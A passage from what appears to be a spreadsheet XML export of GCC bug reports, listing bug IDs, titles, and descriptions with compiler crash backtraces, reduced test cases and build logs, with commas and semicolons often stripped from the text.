0xeda6a9 vect_build_slp_tree
	../../src-trunk/gcc/tree-vect-slp.c:1054
0xeda445 vect_build_slp_tree
	../../src-trunk/gcc/tree-vect-slp.c:1010
0xedc2bc vect_analyze_slp_instance
	../../src-trunk/gcc/tree-vect-slp.c:1636
0xedda56 vect_analyze_slp(_loop_vec_info* _bb_vec_info* unsigned int)
	../../src-trunk/gcc/tree-vect-slp.c:1768
0xeddf29 vect_slp_analyze_bb_1
	../../src-trunk/gcc/tree-vect-slp.c:2300
0xeddf29 vect_slp_analyze_bb(basic_block_def*)
	../../src-trunk/gcc/tree-vect-slp.c:2421
0xee0332 execute
	../../src-trunk/gcc/tree-vectorizer.c:657
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-48062</t>
  </si>
  <si>
    <t>`shadowed declaration is here' should be a note</t>
  </si>
  <si>
    <t>cat &gt; main.c
int i
int main(void)
{
  int i = 0
  return i
}
^D
$ gcc -Wshadow main.c
main.c: In function 'main':
main.c:5:7: warning: declaration of 'i' shadows a global declaration [-Wshadow]
main.c:1:5: warning: shadowed declaration is here [-Wshadow]</t>
  </si>
  <si>
    <t>GCC-1715</t>
  </si>
  <si>
    <t>Tree check: expected class 't' have 'x' (error_mark)</t>
  </si>
  <si>
    <t>The following bogus source code contained in ti2.c generates the
message Tree check: expected class 't' have 'x' (error_mark) when
compiled by gcc-20010118.
Release:
2.97 20010118 (experimental)
Environment:
System: Linux kiste 2.4.0 #25 Tue Jan 16 01:22:25 CET 2001 i686 unknown
Architecture: i686
glibc 2.1.3
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-nls --enable-shared
How-To-Repeat:
source file ti2.c
int b[NR_IRQS] = { [0 ... NR_IRQS-1] = { }}
preprocessed source file
ti2.i
# 1 ti2.c
int b[NR_IRQS] = { [0 ... NR_IRQS-1] = { }}
Compiling the source file
gcc -v -Wall ti2.c -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc/configure --enable-nls --enable-shared
gcc version 2.97 20010118 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cpp0 -lang-c -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ ti2.c ti2.i
GNU CPP version 2.97 20010118 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cc1 -fpreprocessed ti2.i -quiet -dumpbase ti2.c -Wall -version -o ti2.s
GNU CPP version 2.97 20010118 (experimental) (cpplib) (i386 Linux/ELF)
GNU C version 2.97 20010118 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 2.97 20010118 (experimental).
ti2.c:1: `NR_IRQS' undeclared here (not in a function)
ti2.c:1: `NR_IRQS' undeclared here (not in a function)
ti2.c:1: Tree check: expected class 't' have 'x' (error_mark)
confused by earlier errors bailing out</t>
  </si>
  <si>
    <t>GCC-26816</t>
  </si>
  <si>
    <t>[4.1 only] FLOAT Intrinsic does not work with Integer Halfword input</t>
  </si>
  <si>
    <t>[bdavis@gfortran ac_avionics]$ cat b.f
      REAL*4 EW
      INTEGER*2 IH
      IH = 2
      EW = FLOAT(IH)
      PRINT*EW
      END
[bdavis@gfortran ac_avionics]$ g77 b.f
[bdavis@gfortran ac_avionics]$ ./a.out
  2.
[bdavis@gfortran ac_avionics]$ gfortran b.f
 In file b.f:4
      EW = FLOAT(IH)
                1
Error: Type of argument 'a' in call to 'float' at (1) should be INTEGER(4) not INTEGER(2)</t>
  </si>
  <si>
    <t>bdavis</t>
  </si>
  <si>
    <t>GCC-2913</t>
  </si>
  <si>
    <t>iostreams ignore No space left on device condition</t>
  </si>
  <si>
    <t xml:space="preserve">	
iostreams in the new libstc++ ignore out of space errors no exception or
error flags are set.
Release:
3.0 20010426 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux charon 2.4.4hpt #1 Thu May 3 15:30:52 MST 2001 i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-x --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
How-To-Repeat:
nospacetest.cpp:
#include 
#include 
using namespace std
int main(void) {
	ofstream foo(foo.bar)
	foo &lt;&lt; hellohellohellohello\n
	cout &lt;&lt; foo.good() &lt;&lt; &lt;&lt; foo.eof() &lt;&lt; &lt;&lt; foo.fail() &lt;&lt; &lt;&lt; foo.bad() &lt;&lt;\n
	foo.close()
	cout &lt;&lt; foo.good() &lt;&lt; &lt;&lt; foo.eof() &lt;&lt; &lt;&lt; foo.fail() &lt;&lt; &lt;&lt; foo.bad() &lt;&lt;\n
	return 0
}
mount -t tmpfs tmpfs /mnt -o remountdefaultssize=0knr_inodes=1k
cd /mnt
nospacetest
1 0 0 0
1 0 0 0
output when compiled with gcc 2.95:
1 0 0 0
0 0 2 0</t>
  </si>
  <si>
    <t>donut</t>
  </si>
  <si>
    <t>GCC-502</t>
  </si>
  <si>
    <t>Tree check: expected function_type have method_type</t>
  </si>
  <si>
    <t>While attempting to compile the latest snapshot of libgcj (downloaded
27 Aug 2000) get an ICE on java/lang/natClass.lo in method
`java::lang:String*java::lang::Class:getName ()'
java/lang/natClass.cc is the source file.
Release:
2.96
Environment:
System: Linux localhost.localdomain 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>leg</t>
  </si>
  <si>
    <t>GCC-37857</t>
  </si>
  <si>
    <t>[graphite] Segmentation fault</t>
  </si>
  <si>
    <t>gfortran -O2 -floop-block  final_protein.f90
final_protein.f90: In function 'superficie_proteina':
final_protein.f90:1: error: type mismatch between an SSA_NAME and its symbol
final_protein.f90:1: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>mitul.thakkar</t>
  </si>
  <si>
    <t>GCC-22237</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] struct copy inlining generates overlapping memcpy</t>
  </si>
  <si>
    <t>The following test should execute successfully (see C99 6.8.6.4#3 and #4: a
return statement is not an assignment so can be used to copy between overlapping
structures - added in C90 TC1 following DR#001).  With 4.0 branch and mainline
it aborts when compiled at -O3 (maybe other levels as well) because the
assignment via an inline function call has been wrongly optimized to a direct
assignment.  gcc.c-torture/execute/20010124-1.c used to test for such an issue
but it now all gets optimized away so a more complicated test such as this one
is needed.
extern void abort (void)
extern void exit (int)
struct s { unsigned char a[256] }
union u { struct { struct s b int c } d struct { int c struct s b } e }
union u v
union u v0
struct s *p = 
struct s *q = 
static inline struct s rp (void) { return *p }
static inline struct s rq (void) { return *q }
void pq (void) { *p = rq() }
void qp (void) { *q = rp() }
void
init (struct s *sp)
{
  int i
  for (i = 0 i &lt; 256 i++)
    sp-&gt;a[i] = i
}
void
check (struct s *sp)
{
  int i
  for (i = 0 i &lt; 256 i++)
    if (sp-&gt;a[i] != i)
      abort ()
}
int
main (void)
{
  v = v0
  init (p)
  qp ()
  check (q)
  v = v0
  init (q)
  pq ()
  check (p)
  exit (0)
}</t>
  </si>
  <si>
    <t>GCC-33371</t>
  </si>
  <si>
    <t>gcc: libgomp.spec: No such file or directory</t>
  </si>
  <si>
    <t>gcc -fopenmp -O2 -s -o .libs/msgmerge msgmerge-msgmerge.o msgmerge-msgl-fsearch.
o msgmerge-plural-count.o -fopenmp  ./.libs/libgettextsrc.sl /xxx/gnu/gettext-0.
16.1/objdir/gettext-tools/gnulib-lib/.libs/libgettextlib.sl /xxx/gnu/gettext-0.1
6.1/objdir/gettext-tools/intl/.libs/libintl.sl -lc -lm -Wl+b -Wl/xxx/gnu/gette
xt-0.16.1/objdir/gettext-tools/src/.libs:/xxx/gnu/gettext-0.16.1/objdir/gettext-
tools/gnulib-lib/.libs:/xxx/gnu/gettext-0.16.1/objdir/gettext-tools/intl/.libs:/
opt/gnu/lib
gcc: libgomp.spec: No such file or directory</t>
  </si>
  <si>
    <t>GCC-18781</t>
  </si>
  <si>
    <t>[ICE] WRITE with FMT from CHARACTER array</t>
  </si>
  <si>
    <t>Hi
working along the non-resolved NIST test failures here is the reduced test case
for FM711:
----------------------------------
      PROGRAM FM711
      IMPLICIT NONE
      CHARACTER C1N002(4)*5
      DATA C1N002 / '(10HI' '/O TE' 'ST: ' ' A10)' /
      WRITE (* FMT=C1N002) 1
      STOP
      END
----------------------------------
With gcc version 4.0.0 20041202 compilation exits on an ICE:
$ gfortran foo.f -c
foo.f: In function â€˜MAIN__â€™:
foo.f:5: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-11129</t>
  </si>
  <si>
    <t>TLS broken on i686 and x86-64</t>
  </si>
  <si>
    <t>gromit:~/tmp:[1]$ /opt/gcc/3.4-devel/bin/gcc -fpreprocessed tls1.i -O2
tls1.i: In function `main':
tls1.i:64: error: unrecognizable insn:
(insn:HI 19 362 20 1 0x40194580 (set (reg/f:SI 66)
        (const:SI (plus:SI (unspec:SI [
                        (symbol_ref:SI (local) [flags 0x22] &lt;var_decl
0x40197a20 local&gt;)
                    ] 5)
                (const_int 4 [0x4])))) -1 (nil)
    (nil))
tls1.i:64: internal compiler error: in extract_insn at recog.c:2188
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gromit:~/tmp:[1]$ /opt/gcc/3.4-devel/bin/gcc -fpreprocessed -v
Reading specs from /opt/gcc/3.4-devel/lib/gcc-lib/i686-suse-linux-gnu/3.4/specs
Configured with: /cvs/gcc/configure --prefix=/opt/gcc/3.4-devel --disable-nls
--enable-threads=posix --enable-clocale=gnu --enable-__cxa_atexit
--enable-shared --enable-languages=cc++f77objcadatreelangjavaf77
--enable-checking=misctreertlgcrtlflag --with-system-zlib i686-suse-linux-gnu
Thread model: posix
gcc version 3.4 20030604 (experimental)
Btw. the same appears with x86_64:
http://gcc.gnu.org/ml/gcc-bugs/2003-05/msg00940.html</t>
  </si>
  <si>
    <t>GCC-83958</t>
  </si>
  <si>
    <t>[7 Regression] ICE: Segmentation fault (in find_decomp_class_base)</t>
  </si>
  <si>
    <t>While reducing the testcase from PR83481 I've found a snippet that still makes both g++ 7 and 8 (r256677) ICE:
template  struct ab
class b
template &gt; class c
template  struct ae
template 
class e {
public:
  using ah = d
  ah operator*()
  af operator++()
  template 
  bool operator!=(e)
}
template  class aj {
public:
  class ad
  using ak = ae
  using am = e&lt;ad i ag ad ak ak 
  class ad : public am {}
  ad begin()
  ad end()
}
template  class c : aj {
  using ao = aj
public:
  using ao::begin
  using ao::end
}
using ap = class aq
class ar {
  void as() { for (auto &amp; [ a ] : at) {} }
  c at
}
% g++-8.0.0-alpha20180114 -std=c++1z -w -c file_upload.i
file_upload.i: In member function 'void ar::as()':
file_upload.i:32:35: internal compiler error: Segmentation fault
   void as() { for (auto &amp; [ a ] : at) {} }
                                   ^~
0xea3a0f crash_signal
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/toplev.c:325
0x853a88 tree_check(tree_node* char const* int char const* tree_code)
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/tree.h:3126
0x853a88 find_decomp_class_base
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/decl.c:7215
0x875eb3 cp_finish_decomp(tree_node* tree_node* unsigned int)
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/decl.c:7604
0x8e9e24 cp_convert_range_for(tree_node* tree_node* tree_node* tree_node* unsigned int bool unsigned short)
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:11928
0x8ee82b cp_parser_range_for
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:11753
0x9198de cp_parser_for
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:11615
0x9198de cp_parser_iteration_statement
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:12172
0x8f5ec6 cp_parser_statement
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:10766
0x8f6ee0 cp_parser_statement_seq_opt
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:11206
0x8f6fb7 cp_parser_compound_statement
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:11160
0x90de50 cp_parser_function_body
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:21700
0x90de50 cp_parser_ctor_initializer_opt_and_function_body
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:21737
0x90e770 cp_parser_function_definition_after_declarator
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:26635
0x91058c cp_parser_late_parsing_for_member
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:27515
0x90235e cp_parser_class_specifier_1
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:22666
0x903639 cp_parser_class_specifier
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:22692
0x903639 cp_parser_type_specifier
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:16698
0x910e6c cp_parser_decl_specifier_seq
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:13559
0x916ec3 cp_parser_simple_declaration
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20180114/work/gcc-8-20180114/gcc/cp/parser.c:12867</t>
  </si>
  <si>
    <t>GCC-21786</t>
  </si>
  <si>
    <t>Segmentation fault under FreeBSD 5.3-RELEASE-p15</t>
  </si>
  <si>
    <t>While doing a full recompile of the whole FreeBSD 5.3-RELEASE-p15 source tree
the gcc 3.4.5 snapshot crashed with a segfault.
The comamnd line that triggered the error:
/usr/local/bin/gcc34 -s -Os -pipe -march=athlon64 -I.
-I/usr/src/gnu/usr.bin/binutils/libbfd
-I/usr/src/gnu/usr.bin/binutils/libbfd/../libbfd
-I/usr/obj/usr/src/amd64/usr/src/gnu/usr.bin/binutils/libbfd/../libbfd
-I/usr/src/gnu/usr.bin/binutils/libbfd/../../../../contrib/binutils/include
-D_GNU_SOURCE
-I/usr/src/gnu/usr.bin/binutils/libbfd/../../../../contrib/binutils/bfd
-DSELECT_ARCHITECTURES=&amp;bfd_i386_arch -DHAVE_bfd_elf64_x86_64_vec
-DHAVE_bfd_elf32_i386_freebsd_vec -DSELECT_VECS= &amp;bfd_elf64_x86_64_vec
&amp;bfd_elf32_i386_freebsd_vec -DDEFAULT_VECTOR=bfd_elf64_x86_64_vec 
-I/usr/obj/usr/src/amd64/legacy/usr/include -c
/usr/src/gnu/usr.bin/binutils/libbfd/../../../../contrib/binutils/bfd/elf.c
/usr/src/gnu/usr.bin/binutils/libbfd/../../../../contrib/binutils/bfd/elf.c: In
function `_bfd_elf_compute_section_file_positions':
/usr/src/gnu/usr.bin/binutils/libbfd/../../../../contrib/binutils/bfd/elf.c:3143:
internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
*** Error code 1
The snapshot version information:
root@server# /usr/local/bin/gcc34 -v
Reading specs from /usr/local/lib/gcc/x86_64-portbld-freebsd5.3/3.4.5/specs
Configured with: ./..//gcc-3.4-20050524/configure --disable-nls
--with-system-zlib --with-libiconv-prefix=/usr/local --program-suffix=34
--with-gxx-include-dir=/usr/local/lib/gcc/x86_64-portbld-freebsd5.3/3.4.5/include/c++/
--disable-shared --disable-libgcj --prefix=/usr/local x86_64-portbld-freebsd5.3
Thread model: posix
gcc version 3.4.5 20050524 (prerelease) [FreeBSD]
The uname -a output of the computer:
root@server# uname -a
FreeBSD server.t-hosting.hu 5.3-RELEASE-p15 FreeBSD 5.3-RELEASE-p15 #0: Thu May
26 14:21:20 CEST 2005    
root@server.t-hosting.hu:/usr/src/sys/amd64/compile/FREEBSD  amd64
The used macros and flags:
CC=/usr/local/bin/gcc34
CFLAGS=-s -Os -pipe -march=athlon64
COPTFLAGS=-s -Os -march=athlon64 -pipe
The same code compiles in same circumstances with the stock gcc 3.4.2. If You
need further information contact me.
Regards
GÃ¡bor KÃ¶vesdÃ¡n</t>
  </si>
  <si>
    <t>postmaster</t>
  </si>
  <si>
    <t>GCC-8975</t>
  </si>
  <si>
    <t>Re: c++/8966: Lost exceptions across library boundaries</t>
  </si>
  <si>
    <t xml:space="preserve"> Dan Ingold  writes:
 | Wolfgang
 | 
 | In retesting I found that my simplified example does not exhibit the
 | error.  My full application does but it's too complex to submit for a
 | bug report.
 I would like to add some note to this report.  
 You're not the first person I'm seeing mentionning this behaviour.
 Last month I discussed a similar issue with Christophe de Vienne
 (cdevienne@alphacent.com) on the French speaking newsgroup 
 news:fr.comp.lang.c++.  See thread starting at 
     Message-ID: 
 if you can read French.  Typically some exceptions thrown from a shared 
 library lib1 could not be caught in another shared library lib2.  He
 spent lots of days trying to reduce the problem to a smaller testcase
 but didn't succeed :-(  This issue is reported as a regression from 2.95.x
 I think there is a real problem here.  However I don't know the GNATS
 category for such a report.  I'm really uneasy with closing it.
 suspend state?
 -- Gaby
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-28077</t>
  </si>
  <si>
    <t>[4.3 regression] pass39-frag.c produces mudflap violation on alpha</t>
  </si>
  <si>
    <t>libmudflap.cth/pass39-frag.c (and I think pass37-frag.c) produce mudflap violations on Alpha.  In dmesg you get messages like these:
 pass39-frag.exe(7421): unaligned trap at 0000000120001ff8: b029001c2022000f 29 1 
 pass39-frag.exe(7552): unaligned trap at 0000000120001ff8: b029001c2022000f 29 1
 pass39-frag.exe(7421): unaligned trap at 0000000120001ff8: b029001c2022000f 29 1
I'll attach the relevant portions of libmudflap.log.</t>
  </si>
  <si>
    <t>GCC-32729</t>
  </si>
  <si>
    <t>[4.3 Regression] : Loop unrolling not performed with large constant loop bound</t>
  </si>
  <si>
    <t>Consider the following functions:
// g++ -mtune=core2 -O3 -S -dp
void loop(int* dest int* src int count) {
  for(int i=0 i &lt; count i++)
    dest[i] = src[i]
}
void loop_few(int* dest int* src) { loop(dest src 8) }
void loop_many(int* dest int* src) { loop(dest src 64) }
loop() unrolls 8x as expected. loop_few() peels completely as expected. However loop_many() neither peels nor unrolls. 
_Z9loop_manyPiS_:
        xorl    %edx %edx      # 34    *movdi_xor_rex64        [length = 2]
.L47:
        movl    (%rsi%rdx4) %eax     # 11    *movsi_1/1      [length = 3]
        movl    %eax (%rdi%rdx4)     # 12    *movsi_1/2      [length = 3]
        incq    %rdx    # 13    *adddi_1_rex64/1        [length = 3]
        cmpq    $64 %rdx       # 15    cmpdi_1_insn_rex64/1    [length = 4]
        jne     .L47    # 16    *jcc_1  [length = 2]
        rep  ret       # 35    return_internal_long    [length = 1]                                                                        
Ideally the optimizer would unroll 8x then notice that (count%8==0) and eliminate the partial unroll code. However even a stock unroll would be better than nothing.</t>
  </si>
  <si>
    <t>scovich</t>
  </si>
  <si>
    <t>GCC-41011</t>
  </si>
  <si>
    <t>ICE in ipcp_lattice_from_jfunc at ipa-cp.c:328</t>
  </si>
  <si>
    <t>at -O3 -fwhole-file
      CALL UVSET(NXNYNZHVARZETNPDZDKMUMVMUGVGTMDCDX
     *ITYISHNSMTF)
         CALL DCTDX(NXNYNX1NFILTC(MLAG)DCDX(MLAG)HELPHELPA
     *   HELPHELPAFYFYCSAVEY)
      END
      SUBROUTINE PADEC(DKSDKDSHVARWMWGFNNSANBNCNIT)
      COMPLEX*16 WM(*)WG(*)FN(*)AN(*)BN(*)CN(*)
         BN(J)=F4+AS+GAMMA*F2
         CN(J)=F4-AS+GAMMA*F2
         FN(J)=(AS+F4-GAMMA*F2)*H2+(F4-AS-GAMMA*F2)*H0+
     *   H1*(F3-GAMMA/3.D0)+GAMMA*WG(J)-CONST
      END
      SUBROUTINE UVSET(NXNYNZHVARZETNPDZDKMUMVMUGVGTM
     *WORKITYIHNSMTF)
      DIMENSION HVAR(*)ZET(*)TM(*)DKM(*)UM(*)VM(*)UG(*)VG(*)
     *WORK(*)
      IF(IH.EQ.0) THEN
         CALL PADEC(DKMVMHVARWORK(LWM)WORK(LWG)
     *   WORK(LF)NZWORK(LA)WORK(LB)WORK(LC)ITY)
      ENDIF
      END</t>
  </si>
  <si>
    <t>GCC-12280</t>
  </si>
  <si>
    <t>[3.4 Regression] unrecognizable insn on simple Java code</t>
  </si>
  <si>
    <t>jc1 crashes with an unrecognizable insn when compiling the
following code with -O:
class Type { int size }
public class Dup
{
  public void emitDup (int size int offset) {  }
  public void emitDup (Type type)
  { emitDup(type.size &gt; 4 ? 2 : 1 0)  }
}
This is simplified from Kawa which fails to build
because of this.
This has been failing for a while on the mainline but
it used to work.</t>
  </si>
  <si>
    <t>bothner</t>
  </si>
  <si>
    <t>GCC-54683</t>
  </si>
  <si>
    <t>[4.8 Regression] Bootstrap comparison failure</t>
  </si>
  <si>
    <t>The following comparison failures were introduced in revision 191494:
Bootstrap comparison failure!
gcc/builtins.o differs
gcc/rtlanal.o differs
gcc/cp/parser.o differs
gcc/tree-if-conv.o differs
make[2]: *** [compare] Error 1
make[2]: Leaving directory `/home/dave/gnu/gcc/objdir'
dave@mx3210:~/gnu/gcc/objdir/stage3-gcc$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa-linux-gnu
Configured with: ../gcc/configure --with-gnu-as --with-gnu-ld --enable-shared --enable-multiarch --with-multiarch-defaults=hppa-linux-gnu --enable-linker-build-id --build=hppa-linux-gnu --host=hppa-linux-gnu --target=hppa-linux-gnu --prefix=/home/dave/opt/gnu/gcc/gcc-4.8.0 --with-local-prefix=/home/dave/opt/gnu --enable-threads=posix --enable-__cxa_atexit --build=hppa-linux-gnu --enable-clocale=gnu --enable-java-gc=boehm --without-cloog --without-ppl --enable-languages=c
Thread model: posix
gcc version 4.8.0 20120919 (experimental) [trunk revision 191494] (GCC) 
dave@mx3210:~/gnu/gcc/objdir/stage3-gcc$ cmp ../stage2-gcc/builtins.o builtins.o../stage2-gcc/builtins.o builtins.o differ: byte 1222982 line 8127
There is no difference in code but there is a difference in the
.debug_info section:
dave@mx3210:~/gnu/gcc/objdir/stage3-gcc$ diff -u builtins.o-d2 builtins.o-d3|less
--- builtins.o-d2       2012-09-23 09:38:14.000000000 -0400
+++ builtins.o-d3       2012-09-23 09:39:07.000000000 -0400
@@ -15 +15 @@
-../stage2-gcc/builtins.o:     file format elf32-hppa-linux
+builtins.o:     file format elf32-hppa-linux
 Contents of the .debug_info section:
@@ -20886227 +20886227 @@
   Set File Name to entry 2 in the File Name Table
   Advance Line by 9843 to 13624
   Special opcode 47: advance Address by 12 to 0x2f00 and Line by 0 to 13624
-  Extended opcode 4: set Discriminator to 7
+  Extended opcode 4: set Discriminator to 4
   Set is_stmt to 0
   Special opcode 33: advance Address by 8 to 0x2f08 and Line by 0 to 13624
-  Extended opcode 4: set Discriminator to 4
+  Extended opcode 4: set Discriminator to 8
   Special opcode 19: advance Address by 4 to 0x2f0c and Line by 0 to 13624
-  Extended opcode 4: set Discriminator to 4
+  Extended opcode 4: set Discriminator to 8
   Set is_stmt to 1
   Special opcode 25: advance Address by 4 to 0x2f10 and Line by 6 to 13630
-  Extended opcode 4: set Discriminator to 4
+  Extended opcode 4: set Discriminator to 8
   Special opcode 15: advance Address by 4 to 0x2f14 and Line by -4 to 13626
-  Extended opcode 4: set Discriminator to 4
+  Extended opcode 4: set Discriminator to 8
   Special opcode 23: advance Address by 4 to 0x2f18 and Line by 4 to 13630
-  Extended opcode 4: set Discriminator to 4
+  Extended opcode 4: set Discriminator to 8
   Special opcode 34: advance Address by 8 to 0x2f20 and Line by 1 to 13631
-  Extended opcode 4: set Discriminator to 4
+  Extended opcode 4: set Discriminator to 8
   Special opcode 62: advance Address by 16 to 0x2f30 and Line by 1 to 13632
-  Extended opcode 4: set Discriminator to 4
+  Extended opcode 4: set Discriminator to 8
   Special opcode 34: advance Address by 8 to 0x2f38 and Line by 1 to 13633
-  Extended opcode 4: set Discriminator to 4
+  Extended opcode 4: set Discriminator to 8
   Special opcode 90: advance Address by 24 to 0x2f50 and Line by 1 to 13634
-  Extended opcode 4: set Discriminator to 4
+  Extended opcode 4: set Discriminator to 8
   Special opcode 62: advance Address by 16 to 0x2f60 and Line by 1 to 13635
   Extended opcode 4: set Discriminator to 1
   Advance Line by -20 to 13615
@@ -2089087 +2089087 @@
   Set File Name to entry 2 in the File Name Table
   Advance Line by 9843 to 13624
   Special opcode 33: advance Address by 8 to 0x2fbc and Line by 0 to 13624
-  Extended opcode 4: set Discriminator to 6
+  Extended opcode 4: set Discriminator to 3
   Set is_stmt to 0
   Special opcode 33: advance Address by 8 to 0x2fc4 and Line by 0 to 13624
   Set File Name to entry 4 in the File Name Table</t>
  </si>
  <si>
    <t>GCC-30018</t>
  </si>
  <si>
    <t>[4.3 Regression] gcc trunk fails as make install when bootstrapping with GCC before 4.2</t>
  </si>
  <si>
    <t>Building the trunk into an empty directoy with
$GCCDIR/configure --enable-languages=cfortran 
   --prefix=/projects/tob/gcc-trunk &amp;&amp; make &amp;&amp; make install
on an openSUSE 10.2rc2 system fails with
'cc1: error: unrecognized command line option -Wno-overlength-strings'.
This is with make since I had the feeling make -j2.
Yesterdays build with r119277 was still ok the error occurs with r119303 up to r119311. Building GCC 4.2 on the same machine works.
gcc -c   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macr
os -Wno-overlength-strings -Wold-style-definition -Wmissing-format-attribute -Werror -fno-common   -DHAVE_CONFIG_H -I. -I. -I/home/tob/p
rojects/gcc/gcc -I/home/tob/projects/gcc/gcc/. -I/home/tob/projects/gcc/gcc/../include -I/home/tob/projects/gcc/gcc/../libcpp/include  -
I/home/tob/projects/gcc/gcc/../libdecnumber -I../libdecnumber    /home/tob/projects/gcc/gcc/tree-ssanames.c -o tree-ssanames.o
cc1: error: unrecognized command line option -Wno-overlength-strings
There are three cc1:
./gcc/cc1
./stage1-gcc/cc1
./prev-gcc/cc1
And doing
./gcc/cc1 -quiet -Wno-overlength-strings &lt; /dev/null
gives no error. (and no other cc1 is in the path.)
If I do now manually make some files are compiled again the compilation succeeds but with make install I get immediately the -Wno-overlength-strings error again.
which gcc returns:
   /usr/bin/gcc
which is 4.1.2 20061115 (prerelease) (SUSE Linux) which also happily accepts -Wno-overlength-strings.
I cannot reproduce it anymore at the moment but I also had at some point inbetween:
xgcc: error trying to exec 'cc1': execvp: No permission.
(No of pty is also ok: 7 vs. 4096)</t>
  </si>
  <si>
    <t>GCC-45962</t>
  </si>
  <si>
    <t>[4.6 Regression]: many c/c++ failures on cris-elf in r165236:165242</t>
  </si>
  <si>
    <t>Created attachment 22013
Preprocessed gcc.dg-struct-layout-1//t001_x.c.  Run cc1 -w -quiet -fpreprocessed t001_x.i
With revision 165236 these tests passed.
From revision 165242 and on these tests have failed as follows (cutnpasted bad wrapping):
Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.c-torture/execute/execute.exp ...
FAIL: gcc.c-torture/execute/20060420-1.c execution  -O1
FAIL: gcc.c-torture/execute/20060420-1.c execution  -O2
FAIL: gcc.c-torture/execute/20060420-1.c execution  -O3 -fomit-frame-pointer
FAIL: gcc.c-torture/execute/20060420-1.c execution  -O3 -fomit-frame-pointer -funroll-loops
FAIL: gcc.c-torture/execute/20060420-1.c execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions
FAIL: gcc.c-torture/execute/20060420-1.c execution  -O3 -g
FAIL: gcc.c-torture/execute/20060420-1.c execution  -Os
FAIL: gcc.c-torture/execute/20060420-1.c execution  -O2 -flto
FAIL: gcc.c-torture/execute/20060420-1.c execution  -O2 -fwhopr
... (non-regressions elided)
FAIL: gcc.c-torture/execute/simd-5.c execution  -O0
... (non-regressions elided)
